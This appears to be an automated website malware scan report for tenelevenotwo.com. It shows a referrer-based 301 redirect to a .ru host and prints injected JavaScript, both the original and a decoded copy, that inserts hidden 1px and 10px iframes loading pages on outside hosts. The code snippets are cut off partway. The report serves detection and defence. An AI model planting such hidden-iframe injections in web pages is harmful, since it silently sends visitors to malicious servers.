Malicious/Suspicious Redirects
URL: http://tenelevenotwo.com/ (imitation of visitor from search engine)
Status: malicious

Request:

    GET / HTTP/1.1
    Host: tenelevenotwo.com
    Referer: http://www.google.com/search?q=redirect+check1

Server response:

    HTTP/1.1 301 Moved Permanently
    Connection: close
    Date: Wed, 18 Jun 2014 05:09:08 GMT
    Location: http://ypnofkiq.ru/count28.php
    Server: Apache
    Content-Length: 305
    Content-Type: text/html; charset=iso-8859-1

Scanned pages/files
Request | Server response | Status |
http://tenelevenotwo.com/ | 200 OK Content-Length: 26693 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)

    function zzzfff() {
        var x = document.createElement('iframe');
        x.src = 'http://ypnofkiq.ru/count28.php';
        x.style.position = 'absolute';
        x.style.border = '0';
        x.style.height = '1px';
        x.style.width = '1px';
        x.style.left = '1px';
        x.style.top = '1px';
        if (!document.getElementById('x')) {
            document.write('<div id=\'x\'></div>');
            document.getElementById('x').appendChild(x);
        }
    }
    function SetCookie(cookieName,cookieValue,nDays,path) {
        var today = new Date();
        var expire = new Date();
        if (nDays==n

Decoded script:

    if (document.getElementsByTagName('body')[0]){
        iframer();
    } else {
        document.write("<iframe src='http://mmpwxsvk.ce.ms/count14.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
    }
    function iframer(){
        var f = document.createElement('iframe');
        f.setAttribute('src','http://mmpwxsvk.ce.ms/count14.php');
        f.style.visibility='hidden';
        f.style.position='absolute';
        f.style.left='0';
        f.style.top='0';
        f.setAttribute('width','10');
        f.setAtt

    <iframe src='http://mmpwxsvk.ce.ms/count14.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>

Antivirus reports:

http://www.cool79.com.tw/images/process.js | 404 Not Found Content-Length: 215 Content-Type: text/html | clean |
http://www.cool79.com.tw/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://www.sshi.com.cn/js/process.js | 404 Not Found Content-Length: 1308 Content-Type: text/html | clean |
http://fossfotography.com/wp-content/uploads/process.js | 200 OK Content-Length: 0 Content-Type: application/javascript | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=tenelevenotwo.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://tenelevenotwo.com/
Result: tenelevenotwo.com is not infected or malware details are not published yet.